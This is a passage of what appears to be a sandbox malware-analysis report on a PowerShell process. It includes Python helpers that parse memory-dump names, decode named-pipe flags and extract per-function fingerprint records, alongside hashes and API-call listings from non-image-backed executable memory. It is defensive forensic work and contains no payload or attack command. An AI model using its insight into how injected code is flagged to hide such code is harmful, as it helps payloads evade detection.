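        return self.mem_type == 0x1000000     # MEM_IMAGE: mapped from a PE on disk

    def verdict(self) -> str:
        if self.executable and not self.image_backed:
            kind = "RWX" if self.writable else "RX"
            return f"{kind} code outside any PE image (JIT, unpacked payload or injected code)"
        return "image-backed" if self.image_backed else "data region"


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    return Region(
        process_index=int(m["proc"], 16),
        snapshot=int(m["snap"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mtype"], 16),
    )


# CreateNamedPipeW dwOpenMode (winbase.h). WRITE_OWNER shares bit 0x00080000 with
# FILE_FLAG_FIRST_PIPE_INSTANCE, so that bit is reported under the pipe-flag name.
OPEN_MODE_ACCESS = {0x1: "PIPE_ACCESS_INBOUND", 0x2: "PIPE_ACCESS_OUTBOUND", 0x3: "PIPE_ACCESS_DUPLEX"}
OPEN_MODE_FLAGS = {
    0x00040000: "WRITE_DAC",
    0x00080000: "FILE_FLAG_FIRST_PIPE_INSTANCE",
    0x01000000: "ACCESS_SYSTEM_SECURITY",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}


def decode_open_mode(value: int) -> list[str]:
    """Split a dwOpenMode value into named constants; unknown bits are kept visible."""
    names: list[str] = []
    access = value & 0x3
    if access:
        names.append(OPEN_MODE_ACCESS[access])
    rest = (value & ~0x3) & 0xFFFFFFFF
    for bit in sorted(OPEN_MODE_FLAGS):
        if rest & bit:
            names.append(OPEN_MODE_FLAGS[bit])
            rest &= ~bit
    if rest:
        names.append(f"UNKNOWN(0x{rest:08X})")
    return names


if __name__ == "__main__":
    # Values taken from the CreateNamedPipeW entry in this report.
    region = parse_sdmp("00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp")
    print(f"process {region.process_index} base 0x{region.base:08X}: {region.protect_name}, "
          f"{region.type_name} -> {region.verdict()}")
    print("dwOpenMode 0x40080003 =", " | ".join(decode_open_mode(0x40080003)))
```

Applied to the entry above, 0x40080003 decodes to PIPE_ACCESS_DUPLEX | FILE_FLAG_FIRST_PIPE_INSTANCE | FILE_FLAG_OVERLAPPED, the open mode .NET's NamedPipeServerStream builds for a single-instance asynchronous duplex pipe, and region 08350000 is private PAGE_EXECUTE_READWRITE memory in process 2 (powershell.exe, per the snapshot file name), not backed by a PE on disk, which matches the report's "based on PE: false". Windows PowerShell hosts open such a pipe themselves, so cross-check against a clean powershell.exe run before attributing this call to the dropped payload; the same caution applies to IdentifyCodeAuthzLevelW and ComputeAccessTokenFromCodeAuthzLevel further down, which are the advapi32 exports behind the SAFER (Software Restriction Policies) level and restricted-token checks.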
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 73aab53a661963505ac9354df17b72a4d23b603a90245158e433c32363b3f9fd
                                              • Instruction ID: 9a37ca1401692fbd6707f29ae832fab4dbd37b499a2ed93b320e508d6309e81f
                                              • Opcode Fuzzy Hash: 73aab53a661963505ac9354df17b72a4d23b603a90245158e433c32363b3f9fd
                                              • Instruction Fuzzy Hash: 7411E0B1C0065A9BDB00DF9AD844BDEFBF4FB48324F10812AD418B7240C7B4A954CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 34de5770bb53de929aa25f4fb38b700b056f4818c35b09af1ccb2e7fe0f66698
                                              • Instruction ID: cdcbe45c16b647ec6d0cb2d16946ab28e27042cd8cc3aac34c4224fda9fc4cef
                                              • Opcode Fuzzy Hash: 34de5770bb53de929aa25f4fb38b700b056f4818c35b09af1ccb2e7fe0f66698
                                              • Instruction Fuzzy Hash: D2622834A012148FDB54DF68C884B9DBBF2EF89301F1581A9D809AB365DB74ED82CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7bd457dddc392ca7b2ef5c6d8a70f15e9f7ad751e736773a919dfef707189f5d
                                              • Instruction ID: c5a8b45369023d986035546c742b8daa655f3cfa9f31b9ca544ff1d7f934c7c5
                                              • Opcode Fuzzy Hash: 7bd457dddc392ca7b2ef5c6d8a70f15e9f7ad751e736773a919dfef707189f5d
                                              • Instruction Fuzzy Hash: 72426030A00759DFEB15DB64CC50BA9B776EF88304F1085A9E9097B391DB75ADC1CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 589b0205426e641813b28769a725d4adb9af64704ff138c2bc33e9c92e060750
                                              • Instruction ID: 5cc8c16689aee44657296366263abeb51b5b22bee5a8d4774f704b3d75ae406f
                                              • Opcode Fuzzy Hash: 589b0205426e641813b28769a725d4adb9af64704ff138c2bc33e9c92e060750
                                              • Instruction Fuzzy Hash: FA426B34A10208DFDB15EF68D844A9DBBF2FF88316F148569E806AB350DB75ED42CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093039059.00000000089A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e51c453d59d01d32ffddf7c1d5b0feba11ab362c97b4f0f3b932c7203755abb1
                                              • Instruction ID: 475651a6b18838b18e08aa78a3447f54b3f6c3498430cb7aee8c83f918377864
                                              • Opcode Fuzzy Hash: e51c453d59d01d32ffddf7c1d5b0feba11ab362c97b4f0f3b932c7203755abb1
                                              • Instruction Fuzzy Hash: F1126D34B002089FDB14EFA9D894A9EBBF6FF88355F148558E8069B354DB30ED46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da12d4e2d1f92c7b55666fdc9150b180a92b2a2773e72f5f671c800aedc3e3a4
                                              • Instruction ID: 2efe00080df571b8a4a0735b1b4e5bb6279dbf41e7cef7038a3f480f07a99081
                                              • Opcode Fuzzy Hash: da12d4e2d1f92c7b55666fdc9150b180a92b2a2773e72f5f671c800aedc3e3a4
                                              • Instruction Fuzzy Hash: 4B124C70A00395DFDB11DB68C890B8DFBF2AF85300F148599D949AF352DB71AE85CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 984c260bce8efd518e5510a422eed0f6547ddc43de3f57b4a87ab51a2d5c11b7
                                              • Instruction ID: 5b2cec42b5756cde1c4efa486ef9d3fba462038c9e4e7600b7f4b3df481b0cc8
                                              • Opcode Fuzzy Hash: 984c260bce8efd518e5510a422eed0f6547ddc43de3f57b4a87ab51a2d5c11b7
                                              • Instruction Fuzzy Hash: 43E19030A00719DFEB15DBA4DC50BAEB776EF85304F1081A9E9097B391DB75AD81CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1d4aa2b36136e702916c0ee209e733894dd5bc63fab27d312d55be410bb0e94
                                              • Instruction ID: 274392ec4ec9d38ddb330573095090aa681adbc57361dbc46601d9ae741ca332
                                              • Opcode Fuzzy Hash: d1d4aa2b36136e702916c0ee209e733894dd5bc63fab27d312d55be410bb0e94
                                              • Instruction Fuzzy Hash: 1C910634A00204CFDB14DFA8C584A9DBBF6FF89305F2581A9E805AB362DB71EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d30af545c3c1c28585498fc771f9dca7a8b3fe3691beabd4e1d2a7f61a921ef2
                                              • Instruction ID: 80bf00443caa567c315e100adaf523d1962c99fb92195847795a6476e5554c6a
                                              • Opcode Fuzzy Hash: d30af545c3c1c28585498fc771f9dca7a8b3fe3691beabd4e1d2a7f61a921ef2
                                              • Instruction Fuzzy Hash: AA814C70A00215EFDB11CB64DC81F9EBBB6FF88711F118158E905AB395DBB1AC82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8Fq
                                              • API String ID: 0-3090149526
                                              • Opcode ID: 9101efafa2064c966611c5e17ac55096fb83d030887e6ddd5f00b78960e4861a
                                              • Instruction ID: 26798e6a02b686b3edf0adf10da11744feb4e2c352216803ca21fca852358534
                                              • Opcode Fuzzy Hash: 9101efafa2064c966611c5e17ac55096fb83d030887e6ddd5f00b78960e4861a
                                              • Instruction Fuzzy Hash: 68A2BF34B04249DFDB15CF68C844AAAB7F2AF85316F18C0AAD895DB751CB35DC42CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 089E5660; basic blocks 089E5660-089E5EEA; a call at 089E56C8 has two observed targets, 089E4850 and 089E4860, and a call at 089E5EBA targets 089ED2F4 (rendered graph with executed/not-executed colouring omitted)
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: |S(q
                                              • API String ID: 0-336117713
                                              • Opcode ID: 5de10c3e166957498383dcdd0bfbe3aab875b788dfd073e29da9f6eafe9b9d52
                                              • Instruction ID: 95057b4506e29c590cf4fedd9bb3ee0d3664060d1f0470c43490806c3e1f6c2d
                                              • Opcode Fuzzy Hash: 5de10c3e166957498383dcdd0bfbe3aab875b788dfd073e29da9f6eafe9b9d52
                                              • Instruction Fuzzy Hash: F8420734A00218CFDB15EF64D958BADBBB6FF88319F15846DE8069B3A1DB75AC41CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 050BD408; basic blocks 050BD408-050BD760; calls to 050BCBBC, 050BCBC8, 050BCBD4 and 050BCBE0; IdentifyCodeAuthzLevelW is called from block 050BD68F-050BD6DD; the final block at 050BD760 branches to itself (rendered graph with executed/not-executed colouring omitted)
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d2118dad3c6b7557157389ec33a5c79ee090a0df73607cd6f050ede2d05cfe0
                                              • Instruction ID: 48bb3d564d1d0e1e7b2ea1fbe84ec9435a87632bf4bdd3d54311cea4067343ac
                                              • Opcode Fuzzy Hash: 9d2118dad3c6b7557157389ec33a5c79ee090a0df73607cd6f050ede2d05cfe0
                                              • Instruction Fuzzy Hash: 88916A719003598FEB24DFA5C884BEDBBF5BF48304F1084AAD409AB250DBB59E85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 08359AAC; basic blocks 08359AAC-08359C5A; CreateNamedPipeW is called from block 08359B7A-08359BE8 (the same call site, ref 08359BD8, as the function at 08359594); the final block at 08359C5A branches to itself (rendered graph with executed/not-executed colouring omitted)
                                              APIs
                                              • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08359BD8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateNamedPipe
                                              • String ID:
                                              • API String ID: 2489174969-0
                                              • Opcode ID: 93ef21f051171d7aa107d7cee70a44a641a9b7f16ae4e862825c73a976a94611
                                              • Instruction ID: 4e586de8c165b30513465095cb652cc480119f6aba8f47c185cf88e46dfbfcc0
                                              • Opcode Fuzzy Hash: 93ef21f051171d7aa107d7cee70a44a641a9b7f16ae4e862825c73a976a94611
                                              • Instruction Fuzzy Hash: 305108B1D01348DFDB15CFA9D984B8DBFF2AF88305F24812AE818AB260D7749984CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 050BD5AC; basic blocks 050BD5AC-050BD760; IdentifyCodeAuthzLevelW is called from block 050BD68F-050BD6DD; the final block at 050BD760 branches to itself (rendered graph with executed/not-executed colouring omitted)
                                              APIs
                                              • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 050BD6CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AuthzCodeIdentifyLevel
                                              • String ID:
                                              • API String ID: 1431151113-0
                                              • Opcode ID: e451cdcd8a0c2db89ae8ab02336a5c0cff64893f0bb433bfd2408a4cf7132198
                                              • Instruction ID: a32c893f80d81ec929b15a18395eae9ef59531c1c8424bc392494fb81791acf5
                                              • Opcode Fuzzy Hash: e451cdcd8a0c2db89ae8ab02336a5c0cff64893f0bb433bfd2408a4cf7132198
                                              • Instruction Fuzzy Hash: B441E471801269DFEB64CF59C985BDDBBF5BB08304F1085EAD40DAB250D7B59A88CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 050BCBBC; first basic block spans 050BCBBC-050BD67E, remaining blocks 050BD680-050BD760; IdentifyCodeAuthzLevelW is called from block 050BD68F-050BD6DD; the final block at 050BD760 branches to itself (rendered graph with executed/not-executed colouring omitted)
                                              APIs
                                              • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 050BD6CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AuthzCodeIdentifyLevel
                                              • String ID:
                                              • API String ID: 1431151113-0
                                              • Opcode ID: 93fc3c19783b18eb40dd99601851742c4c09d8c029a2a84eef795cf9b3258ec2
                                              • Instruction ID: 2869e5dda8c22acaba8d53a3f23a5a63efbda0c20cfe3e4fd67619cf6acc75a8
                                              • Opcode Fuzzy Hash: 93fc3c19783b18eb40dd99601851742c4c09d8c029a2a84eef795cf9b3258ec2
                                              • Instruction Fuzzy Hash: 3B41E671801269DFEB64CF59C984BDDBBF5AB08304F1084EAD50DB7250D7B59A84CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

Control-flow Graph
• Function entry 050BCBC8; basic blocks 050BCBC8-050BF454; ComputeAccessTokenFromCodeAuthzLevel is called from the entry block 050BCBC8-050BF423 (rendered graph with executed/not-executed colouring omitted)
                                              APIs
                                              • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 050BF416
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AccessAuthzCodeComputeFromLevelToken
                                              • String ID:
                                              • API String ID: 132034935-0
                                              • Opcode ID: 53cde5b3f2773ce95306a93916f4557f587c5efa5957c6bd4a1fa335afd7d27a
                                              • Instruction ID: 6dc40d02692688484cae769fa68b7676bb3ad08a0972085b3560fcd55cc9584a
                                              • Opcode Fuzzy Hash: 53cde5b3f2773ce95306a93916f4557f587c5efa5957c6bd4a1fa335afd7d27a
                                              • Instruction Fuzzy Hash: ED2129B1800349DFDB10DF9AD884BDEBBF4FB48320F118429E918A7250D774A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (blocks and edges recovered from the rendered graph)
                                              • 2089: 50bf399-50bf3e0; edge to 2090
                                              • 2090: 50bf3e8-50bf423, calls ComputeAccessTokenFromCodeAuthzLevel; edges to 2091 and 2092
                                              • 2091: 50bf42c-50bf454
                                              • 2092: 50bf425-50bf42b; edge to 2091
                                              APIs
                                              • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 050BF416
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AccessAuthzCodeComputeFromLevelToken
                                              • String ID:
                                              • API String ID: 132034935-0
                                              • Opcode ID: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
                                              • Instruction ID: 66058f8d68fe278e97d47967361ca4aa0f186d428418158789bee3a675d0b341
                                              • Opcode Fuzzy Hash: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
                                              • Instruction Fuzzy Hash: D52118768003499FDB10CFAAD884BDEBFF0EF48320F148429E568A7650C3789555CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (blocks and edges recovered from the rendered graph)
                                              • 2095: 50b6be8-50b6c3a; edges to 2098 and 2099
                                              • 2098: 50b6c3c-50b6c3f; edge to 2099
                                              • 2099: 50b6c42-50b6c6d, calls GetFileAttributesW; edges to 2100 and 2101
                                              • 2100: 50b6c6f-50b6c75; edge to 2101
                                              • 2101: 50b6c76-50b6c93
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 0846a0206ec227d79e87491bf75fb495d6bf36b33e6f607fae063e9c44d5b0e5
                                              • Instruction ID: 2027079b4f67e548bdf6cdf247c1c375a91899434ae15e9fe98af17f4bfa8740
                                              • Opcode Fuzzy Hash: 0846a0206ec227d79e87491bf75fb495d6bf36b33e6f607fae063e9c44d5b0e5
                                              • Instruction Fuzzy Hash: 3C214AB1D142599BDB10DFAAD445BEEFBF4FB48320F10812AD418B7240C775A940CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
                                              • Instruction ID: 9f69017f9fcd7ea2b651a6185450ed4e17b9ca357c04e8c3e22a675cb6c703db
                                              • Opcode Fuzzy Hash: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
                                              • Instruction Fuzzy Hash: 122136B1D046599BDB10CF9AD844BEEFBF4FB48320F10812AD819B7650C7B4A940CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 093f572ae0cd9e2a427fb62b4c6a8fbc346c19f0d926ea84d1493aee35778717
                                              • Instruction ID: de2ef93c539b52f2ef044354daaf699a740a8aa39c32f1e80d8731f9e5169c02
                                              • Opcode Fuzzy Hash: 093f572ae0cd9e2a427fb62b4c6a8fbc346c19f0d926ea84d1493aee35778717
                                              • Instruction Fuzzy Hash: 1011E3B1C0065A9BDB00CF9AD984BDEFBB4FB48314F14812AD418B7250D3B4A655CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%
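The records above are per-function fingerprints: each names the memory-dump region the function was lifted from (every region in this section is "based on PE: false", i.e. not backed by an image on disk), any API the function resolves with its call-site address, and stable identifiers (Opcode ID, Instruction ID, the two fuzzy hashes) that can be reused to look for the same code elsewhere. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses such records from the report text, lists which APIs were called from non-PE-backed regions, and collects the Instruction Fuzzy Hashes of the API-calling functions. The sample input is the field lines of three records copied from this section (the bare section headings between them carry no data and are left out); the dict keys and the two summary helpers are this example's own naming.

```python
"""Parse Joe Sandbox per-function records (the "Memory Dump Source / Similarity /
Uniqueness" blocks rendered above) into dicts and summarise them. Added example,
not Joe Sandbox code."""
import re
from collections import defaultdict

# Constructed sample: field lines of three records copied from this section of the
# report (the bare section headings between them carry no data and are omitted).
SAMPLE = """\
• ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 050BF416
• Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
• Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
• API ID: AccessAuthzCodeComputeFromLevelToken
• String ID:
• API String ID: 132034935-0
• Opcode ID: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
• Instruction ID: 66058f8d68fe278e97d47967361ca4aa0f186d428418158789bee3a675d0b341
• Opcode Fuzzy Hash: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
• Instruction Fuzzy Hash: D52118768003499FDB10CFAAD884BDEBFF0EF48320F148429E568A7650C3789555CF61
Uniqueness Score: -1.00%

• GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60
• Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
• Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
• Instruction ID: 9f69017f9fcd7ea2b651a6185450ed4e17b9ca357c04e8c3e22a675cb6c703db
• Opcode Fuzzy Hash: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
• Instruction Fuzzy Hash: 122136B1D046599BDB10CF9AD844BEEFBF4FB48320F10812AD819B7650C7B4A940CFA4
Uniqueness Score: -1.00%

• Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
• Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
• API ID:
• String ID:
• API String ID:
• Opcode ID: fc1ef6d0d821a1fad09bd2eb7045d98360723b7ac55eb8feac54d42d99a3046d
• Instruction ID: 09ea8bb971bd9f2d95f32008ccbbe85a32ff5324387ba2eb7067d274153d70f5
• Opcode Fuzzy Hash: fc1ef6d0d821a1fad09bd2eb7045d98360723b7ac55eb8feac54d42d99a3046d
• Instruction Fuzzy Hash: 8A528A74B01208DFDB15CF98D880A6EB7B2EF84316F19C159E949AB752CB76EC42CB50
Uniqueness Score: -1.00%
"""

RECORD_END = "Uniqueness Score:"           # the report closes every record with this line
# "• GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60"
API_RE = re.compile(r"^• (?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
# "• Source File: <dump>.sdmp, Offset: 050B0000, based on PE: false"
SOURCE_RE = re.compile(r"^• Source File: (?P<file>[^,]+), Offset: (?P<offset>[0-9A-Fa-f]+), "
                       r"based on PE: (?P<pe>true|false)$")
# Any other "• Key: value" field; the key becomes a lower_snake_case dict key.
FIELD_RE = re.compile(r"^• (?P<key>[A-Za-z ]+): ?(?P<val>.*)$")


def parse_records(text):
    """Return one dict per function record, in report order."""
    records, cur = [], {"apis": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(RECORD_END):
            cur["uniqueness"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = {"apis": []}
        elif (m := API_RE.match(line)):
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "args": m["args"].split(","), "ref": int(m["ref"], 16)})
        elif (m := SOURCE_RE.match(line)):
            cur["source_file"] = m["file"]
            cur["offset"] = int(m["offset"], 16)
            cur["pe_backed"] = (m["pe"] == "true")   # false = region not backed by an image on disk
        elif (m := FIELD_RE.match(line)):
            cur[m["key"].lower().replace(" ", "_")] = m["val"].strip()
    if cur.get("opcode_id"):                     # trailing record cut off before its score line
        records.append(cur)
    return records


def injected_api_calls(records):
    """APIs resolved by functions lifted from regions with "based on PE: false",
    grouped by region base address."""
    by_region = defaultdict(set)
    for r in records:
        if r.get("pe_backed") is False:
            for api in r["apis"]:
                by_region[r["offset"]].add(api["name"])
    return {hex(base): sorted(names) for base, names in by_region.items()}


def hunting_hashes(records):
    """De-duplicated Instruction Fuzzy Hashes of every API-calling function, as a
    starting set for matching the same code in other dumps."""
    return sorted({r["instruction_fuzzy_hash"] for r in records
                   if r["apis"] and r.get("instruction_fuzzy_hash")})
```

De-duplication is done on the hash, not on the call site: the two GetFileAttributesW records in this section share the same ref (050B6C60) but carry different Instruction Fuzzy Hashes, so both would be kept when the full section is fed in. Records that end the extracted text without a closing "Uniqueness Score" line are still returned as long as they carry an Opcode ID.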

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf8ef4ac7cb9242b353a1700947546098f186649e0d08c225c73b0c0230e7bb4
                                              • Instruction ID: 874958c02920c7e471130b41c79b98b1b3ed00b3f226b83cae891a63bfde8bbb
                                              • Opcode Fuzzy Hash: cf8ef4ac7cb9242b353a1700947546098f186649e0d08c225c73b0c0230e7bb4
                                              • Instruction Fuzzy Hash: CB52ED38A00348EFEB06DBA0E854BDD7BB7EB98310F148025E90677795CB35A891DF25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
